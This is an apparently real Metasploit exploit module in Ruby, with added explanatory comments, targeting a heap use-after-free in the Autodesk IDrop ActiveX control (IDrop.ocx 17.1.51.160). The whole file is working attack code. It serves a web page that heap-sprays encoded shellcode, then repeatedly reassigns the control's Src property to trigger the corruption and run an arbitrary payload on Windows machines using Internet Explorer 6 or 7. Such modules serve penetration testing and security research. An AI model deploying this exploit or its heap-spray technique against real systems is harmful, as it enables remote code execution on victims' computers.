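##
# $Id: autodesk_idrop.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

#
# Browser exploit for the Autodesk IDrop ActiveX control (IDrop.ocx
# 17.1.51.160).  On request it serves an HTML page that heap-sprays the
# encoded payload and then repeatedly reassigns the control's Src property
# (20 iterations) to trigger the use-after-free described in the references.
#
# Operational caveats worth knowing before pointing a client at this module:
#
# * The spray builds 550 blocks of 0x40000 characters each (see
#   on_request_uri), roughly 144M characters of JavaScript string data, i.e.
#   several hundred megabytes of UTF-16 browser heap.  Clients that are low on
#   memory may crash or hang instead of running the payload.
# * The target 'Ret' (0x0C0C0C0C) is the value the sprayed blocks are filled
#   with, not a code gadget; reliability is entirely a function of whether the
#   spray lands where the freed object is dereferenced.
# * autofilter returns false, so browser autopwn never selects this module on
#   its own; it has to be run explicitly.
#
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # JavaScript reserved words that must never be used as one of the
  # randomised variable names below.  rand_text_alpha() could, rarely,
  # return one of these and the generated page would then be a syntax error.
  JS_RESERVED = %w[
    do if in for let new try var case else enum eval null this true void with
    break catch class const false super throw while yield delete export import
    return switch typeof default extends finally package private continue
    debugger function arguments interface protected implements instanceof
  ].freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Autodesk IDrop ActiveX Control Heap Memory Corruption',
      'Description'    => %q{
          This module exploits a heap-based memory corruption vulnerability in
        Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160.
        An attacker can execute arbitrary code by triggering a heap use after
        free condition using the Src, Background, PackageXml properties.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Elazar Broad <elazarb[at]earthlink.net>', # Original exploit [see References]
          'Trancer <mtrancer[at]gmail.com>'          # Metasploit implementation
        ],
      'Version'        => '$Revision: 9179 $',
      'References'     =>
        [
          [ 'OSVDB', '53265' ],
          [ 'BID', '34352' ],
          [ 'URL', 'http://www.milw0rm.com/exploits/8560' ],
          [ 'URL', 'http://marc.info/?l=full-disclosure&m=123870112214736' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          # The payload is %u-encoded for JavaScript unescape(), so the bad
          # characters only matter for the encoder stage, not for the page.
          'Space'           => 1024,
          'BadChars'        => "\x00\x09\x0a\x0d'\\",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Heap-spray target.  'Ret' is the 32-bit value every sprayed block
          # is filled with; 'Offset' sets the length of the string assigned to
          # the Src property (Offset+1 characters of 0x0a0a after 'http://').
          [ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0',
            { 'Offset' => 900, 'Ret' => 0x0C0C0C0C } ]
        ],
      'DisclosureDate' => 'Apr 2 2009',
      'DefaultTarget'  => 0))
  end

  # Never auto-selected by browser autopwn (see class comment).
  def autofilter
    false
  end

  # Ask the HttpServer mixin for zlib support.  NOTE(review): presumably so
  # the (very large) spray page can be sent compressed - confirm against the
  # mixin before relying on it.
  def check_dependencies
    use_zlib
  end

  # Return +count+ random alphabetic JavaScript identifiers that are pairwise
  # distinct and are not JavaScript reserved words.
  #
  # rand_text_alpha() alone can, rarely, hand back the same short name twice;
  # the generated page would then overwrite one variable with another and the
  # spray would fail silently.  Retrying on collision is cheap insurance.
  #
  # @param count [Integer] number of identifiers wanted
  # @return [Array<String>] identifiers of 1..100 letters each
  def unique_js_names(count)
    names = []
    while names.length < count
      candidate = rand_text_alpha(rand(100) + 1)
      next if names.include?(candidate) || JS_RESERVED.include?(candidate)
      names << candidate
    end
    names
  end

  # Build and send the exploit page to a connecting client.
  #
  # @param cli     the connected HTTP client
  # @param request the client's HTTP request (not inspected here)
  def on_request_uri(cli, request)
    # Re-generate the payload for this client; bail out if that fails.
    return unless regenerate_payload(cli)

    # %u-encode the shellcode for JavaScript unescape()
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Setup exploit buffers.  The "nops" are really the target 'Ret' value
    # repeated: every sprayed block is filled with it and ends with the
    # shellcode, so a transfer anywhere into the spray slides to the payload.
    nops      = Rex::Text.to_unescape([target.ret].pack('V'))
    blocksize = 0x40000          # characters per sprayed block
    fillto    = 550              # number of blocks to spray
    offset    = target['Offset'] # Src string is offset+1 chars of 0x0a0a

    # Randomize the javascript variable names (all guaranteed distinct)
    idrop, j_function, j_shellcode, j_nops, j_headersize, j_slackspace,
      j_fillblock, j_block, j_memory, j_counter, j_ret, j_mem = unique_js_names(12)

    # Build out the message
    content = %Q|<html>
<head>
<script language='javascript' defer>
function #{j_function}() {
  #{j_shellcode}=unescape('#{shellcode}');
  #{j_nops}=unescape('#{nops}');
  #{j_headersize}=20;
  #{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
  while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
  #{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
  #{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
  while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
  #{j_memory}=new Array();
  for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};

  var #{j_ret} = '';
  for (#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++) {
    #{j_ret} += unescape('%u0a0a');
  }

  for(#{j_counter}=0;#{j_counter}<20;#{j_counter}++) {
    try {
      var #{j_mem} = #{idrop}.Src;
      #{idrop}.Src = 'http://' + #{j_ret};
      #{idrop}.Src = #{j_mem};
      #{idrop}.Src = 'http://' + #{j_ret};
    } catch(e){}
  }
}
</script>
</head>
<body onload='return #{j_function}();'>
<object classid='clsid:21E0CB95-1198-4945-A3D2-4BF804295F78' id='#{idrop}'></object>
</body>
</html>
|

    print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end

end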